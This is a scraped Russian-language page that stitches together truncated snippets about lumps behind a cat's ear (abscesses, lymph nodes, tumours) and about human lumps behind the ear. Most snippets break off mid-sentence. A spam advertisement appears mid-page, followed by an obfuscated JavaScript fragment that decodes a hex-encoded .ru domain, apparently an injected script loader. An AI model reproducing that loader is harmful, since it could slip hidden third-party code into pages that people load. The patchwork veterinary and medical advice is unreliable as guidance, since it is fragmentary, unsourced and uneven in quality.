у кошки за ухом шишка что это

Шишка в области уха у кота

у моего кота большая шишка в облости под ухом. он плохо ест, и постоянно спит. что мне делать? что у него за болезнь? как её вылечить?

Абсцесс или гнойник у домашних кошек возникает по разным причинам. Например, абсцесс может появиться после укуса другого животного и появления царапины. Или в результате инфекционного заболевания. Также причинами могут послужить – инфицирование инородным телом или введение нестерильных средств.

При абсцессе возникает ограниченное гнойное воспаление тканей и органов с появлением нагноения. Во внутритканевой полости появляется воспаление гнойного характера.

Гнойники могут быть разными – глубокими или поверхностными. Также горячими, когда гнойник способен вскрыться самостоятельно, или холодными – когда симптомы не явные. При метастатических гнойниках страдают костный мозг и лимфоузлы, а также паренхиматозные органы. При натечных абсцессах гной способен растекаться в разные ткани организма.

Гнойники часто появляются именно в области головы кошек – на щеках и ушах. Но могут возникнуть и на лапах и у основания хвоста с нижней стороны.

Можно, конечно же, попробовать вскрыть такие гнойники самостоятельно. Но всё же, на мой взгляд, было бы лучше, если бы эту процедуру проводил специалист-ветеринар.

Ветеринар может сразу удалить абсцесс, либо попросит подождать, когда гнойник созреет для вскрытия. Чтобы определить, созрел ли гнойник для вскрытия, необходимо осторожно прощупать его пальцами. Если нащупаете мягкий бугорок под кожей и почувствуете, что он наполнен жидкостью, значит, гнойник уже можно вскрывать. Если гнойник еще рано вскрывать, на место абсцесса можно прикладывать теплый компресс. Такой компресс преследует две цели: ограничить распространение инфекции, а также ускорить кровоснабжение пораженного участка и помочь более эффективном

Источник

Шишка за ухом у кота - опасно ли это?

При таком маленьком объеме информации, который вы предоставляете, довольно затруднительно дать полный ответ на ваш вопрос. Нет даже фотографии этой шишки за ухом кошки. Поэтому ограничусь предположениями и посоветую, что делать в разных случаях появления подобной неприятности.

Если вы подобрали кошку на улице, то, скорее всего, у вас нет никаких сведений об общем состоянии ее здоровья: наследственности, инфицированности, наличии воспалительных процессов в ушной раковине и т.д. Вполне возможно, что шишка образовалась просто из-за физической травмы, полученной в драке, при падении. Такую шишку необходимо обработать раствором перекиси водорода, чтобы остановить кровотечение, но не йодом! Дезинфекцию сделайте хлоргексидином, а затем по утрам и вечерам обрабатывайте расчес "Левомеколем" (мазью). Чтобы не допустить нового расчесывания, смастерите коту ошейник-воротничок. Его животное должно носить постоянно, вплоть до полного заживления ранки. Если воротничок снимать на ночь, эффекта от него не будет совершенно – кот снова доберется до своего больного уха и все заново расчешет. И важно, чтобы воротничок не допустил попадания "Левомеколя" в рот коту.

При сильном и запущенном воспалении, локализованном как внутри слухового прохода, так и снаружи, возможно и полное удаление слухового прохода. Нет смысла ждать роста опухоли, так как она может расти и наружу, и внутрь, что в дальнейшем только усложнит операцию. Решение об оперативном вмешательстве – прерогатива врача.

Я все же склоняюсь к другой версии появления шишки. Судя по вашему описанию, кошка постоянно расчесывает ее до крови. Понаблюдайте за животным внимательнее: не пропал ли аппетит, не похудело ли оно, не нарушена ли у него координация движений? Можно предположить гнойный отит, давший осложнение в виде опухоли за ухом. Нет ли с кровью г

Источник

Шишка под кожей у кота

Здравствуйте! Кот беспородный, кастрирован в 8 месяцев, за два-три месяца похудел на 900 гр, сейчас вес 4300. Активный. Беспокоит периодическая рвота, в основном когда он резко наедается, хотя мы не перекармливаем. Но это у него очень давно, я связывала это с перееданием и иногда со скоплением шерсти. Сегодня случайно нашла шишку размером с горошину под кожей, она его вроде не беспокоит при нажатии. Какие обследования нам стоит пройти и что это может быть? Наверное, важно, неделю назад сменили корм с Acana на Orijen, т.к. не могли найти привычный корм в продаже, у кота снизился аппетит, не знаю связать это с шишкой или со сменой питания. На фото видно место расположения шишки.

Описываемая вами так называемая шишка не имеет никакого отношения к общему состоянию животного. С данным образованием под кожей необходимо разбираться отдельно, после нормализации общего состояния. Причин описываемой вами симптоматики может быть достаточно много. Подробно распишите рацион питания животного с указанием ингредиентов в него входящих. Когда вы проводили плановую дегельминтизацию? Когда вакцинировали животное и какой вакциной? Какие витаминные препараты используете дополнительно.  Это очень важная в диагностическом плане информация. Предоставьте ее в ближайшее время.

Примите к сведению что питание кормами Вискас, Фрискас, Мяу, Феликс и Китикет не рекомендовано для кормления кошек. Ни сухими ни влажными. Это очень вредные корма способные рано или поздно спровоцировать заболевания ЖКТ и довольно часто приводят к смерти животного. Сардельки, молоко, супы, борщи и все прочее "то что сами едим" неприменимо для питания кошек. Это правило. Кормите животное либо качественным промышленным кормом: Acana, Gina, Orijen, Hills, Royal Canin, Eukanuba, Go Natural или Now Fresh. Или же натуральными продуктами: рис, овсянка, гречка + говядина, индейка,

Источник

Шишка за ухом: что это может быть такое?

Здоровье Медицина Ав. Садыкова Татьяна

Человеческий организм несовершенен, поэтому время от времени он дает определенные сбои. И, к сожалению, часто они просто пугают человека. Если у пациента прощупывается шишка за ухом - что это такое? Об этом и хочется рассказать.

Лимфоузлы

Все люди знают, что лимфоузлы могут время от времени воспаляться даже в самых неожиданных местах. Так что не стоит слишком пугаться, если была обнаружена шишка за ухом. Что это может быть? Всего лишь воспаленный лимфоузел, говоря медицинским языком – лимфаденит. При этом человек может ощущать боль, которая чаще всего будет отдавать именно в ухо. Если лимфаденит гнойный, болевые ощущения будут довольно-таки сильными, непроходящими, могут сопровождаться повышенной температурой – это более тяжелая форма заболевания, когда может понадобиться даже хирургическое вмешательство. Лечится данная болезнь при помощи антибиотиков, прописанных врачом, в домашних условиях, реже – в стационаре.

Атерома

Что еще может быть, если была обнаружена шишка за ухом? Что это такое и опасно ли это? Такое образование может являться всего лишь псевдоопухолью, атеромой, т. е. кистой сальной железы. Появляются такие бугорки как следствие закупорки выводного протока, они могут возникать после появления фурункула. Возникать атеромы могут практически в любом месте, в том числе и за ушными раковинами. К слову, достигать они могут довольно-таки внушительных размеров, при надавливании пациент может ощущать либо небольшую боль, либо простой дискомфорт. Чтобы избавиться от проблемы, обязательно нужно посетить врача, он и пропишет необходимые для выздоровления медикаменты. Однако можно воспользоваться средствами народной медицины: мазями или растениями, которые также помогают атеромам рассосаться.

Опухоли

Источник

У кота под шеей странные шишки

Здравствуйте. У меня вопрос к кошатникам. В последнее время,у моего кота,под шеей появились шишки. Дело в том,что раньше у него на задней лапе была шишка,но она то лопалась,то надувалась,кровоточила. Вот сейчас на лапе этой шишки уже нет,а на шее появились две. У младшей сестры моего кота таких шишек очень много,а у нас впервые. Вот теперь не знаем,как убрать эти шишки. Кошатники,помогите и объясните пожалуйста что с ним. Заранее спасибо!

к сожалению, весьма вероятно.... но есть еще и аллергические шишки, и гормональные. при последних, их расположение симметричное

У моего знакомого кошка, у неё тоже шишки нащупал, понес к ветеринару. Ну тот сказал что опухоли какие то, надо операцию делать. Её делать не стали, по причине, что может не перенести. Кошка живет уже 4-ый год).

ой! у моей в 17 такая появилась, на горле. до 19 росла и росла. довольно твердая, н оей не болезненная. доросла до того, что ей уже трудно глотать было. когда мурлыкала - хрипела

Я уже писала вам, что нужно срочно показать кота врачу. По описанию никто вам в инете диагноз не поставит. Кроме деревенских теток, которые посоветуют вам лечить его "дегтеревым" мылом....

Несите. Узнаете диагноз. Возможно это спокойно лечится. Не затягивайте. Плюс коты спокойно доживают и до 20 лет, поэтому в 16 делают операции и если у врача руки не из ж..., то проживет еще долго даже если это были опухоли.

У меня коту год, тоже появилась на шее шишка под кожей. он задней лапой ее почесал - она лопнула. Теперь дырка на шее, носила к ветеринару - ничего толком не сказали. прописали левомеколь! не знаю, поможет или не! Даже зашивать не стали

доброе утро кот и заяц
Без предоплаты! Бесплатная доставка по акции. Подпишитесь на магазин по этой ссылке: ok.ru/group/52424855191774 Для заказа пишите менеджеру сюда: ok.ru/profile/580458079550 Добавляйтесь в друзья! Вибер/Ватсап: +7-965-131-09-91 Быстрая доставка во все

У моего кота я обнаружила огромную шишку под шеей, у него изменилось поведение, на руки он не хочет идти, и ╚ кричит╩ не своим голосом если пытаюсь прощупать её! Кто знает что это? Помогите пожалу

Источник

Здравствуйте... сегодня случайно обнаружила большую шишку в районе железок у моего кота. Не могу сказать, что его это беспокоит. Он кушает, играет и нос мокрый. Может до поры до времени? у меня 5 кошек, поэтому, к сожалению, не могу сказать точно как давно она. Но точно, что пару дней назад ее не было. Спасибо большое заранее!

Если вы имеете в виду образование в области лимфоузлов, то это может быть лимфаденопатия (патология лимфоузлов) или абсцесс в результате кусаной раны, не исключено также новообразование. Нужно показать кота врачу, чтобы установить диагноз, лечение зависит от диагноза.

Спасибо большое. сегодня были в ветеринарной клинике. Сначала ему сделали рентген, потом взяли пункцию и показали половину шприца гноя с кровью. Сказали, что это что-то вроде абсцесса в результате драки, затем ему вкололи какой-то антибиотик и сказали, что он будет действовать 15 дней. Это мне показалось очень странным. Так же нам дали таблетки synulox (мы живем в Испании), которые нужно принимать 5 дней. и не прочистив отправили домой. В результате у нас образование такого же размера. Пройдет ли оно с таким лечением? еще раз благодарю!

Возможно, вам сделали Конвению - это пролонгированный антибиотик, он действует две недели. Хотя дополнение синулоксом не совсем логично, спектр действия у них примерно одинаковый. Обязательна санация очага поражения - это ускорит выздоровление и уменьшит вероятность рецидива. Если есть объемная полость, можно расшрить отверстие, обеспечив сток эсккудата, это позволит также промывать полость антисептиками и вводить туда антибактериальные мази.

у 10 дневного котенка гноятся глаза что делать
Подобрали маленького котёнка, на вид месяца 3. У него в уголках глаз скапливается грязь, чихает и сопливится. Подскажите как и чем лечить? Пожалуйста.

Если кошка без прививки и чихает, обязательно следует исключить и

window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="9920",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,

Источник

Здоровье

Вы здесь

Новые публикации

Шишка за ухом

Шишка за ухом – округлое, чаще всего безболезненное образование, которое появляется вследствие увеличения шейного лимфоузла.

Такая патология сама по себе не является заболеванием и не представляет никакой опасности здоровью человека, однако нередко причиняет дискомфорт. По сути, это доброкачественная опухоль или киста, при пальпации напоминающая плотный подвижный шарик.

Бывают случаи, когда шишка со временем увеличивается, достигая размеров перепелиного яйца. Атерома может воспаляться и наполнятся гноем. В такой ситуации необходимо лечение, иначе к данной патологии может присоединиться какая-нибудь инфекция.

Причины шишки за ухом

Шишка за ухом может появляться по ряду различных причин, чаще всего – из-за воспаления лимфатических узлов. Для установления истинной причины воспаления шейного лимфоузла необходимо провести лабораторный анализ, прежде всего, сдать анализ крови, с помощью которого можно определить наличие воспаления или склонность организма к какому-нибудь лимфопролиферативному заболеванию.

Для постановки диагноза и выявления истинной причины возникновения шишки за ухом может понадобиться ультразвуковое исследование, которое покажет, в каком состоянии находится лимфоузел и окружающие его ткани. В более тяжелых случаях применяется метод биопсии лимфоузла, с помощью которого можно выявить атипичные клетки либо наличие воспалительного процесса.

Симптомы шишки за ухом

Шишка за ухом может появиться внезапно и постепенно расти. Установлено, что размеры атеромы могут колебаться от 5 до 45-ти миллиметров.

Симптомы шишки за ухом на начальной стадии ее роста могут никак не проявляться и не беспокоить человека. Главным симптомом будет лишь визуальное проявление атеромы в виде заушной опухоли, имеющей четкие очертания и напол

Источник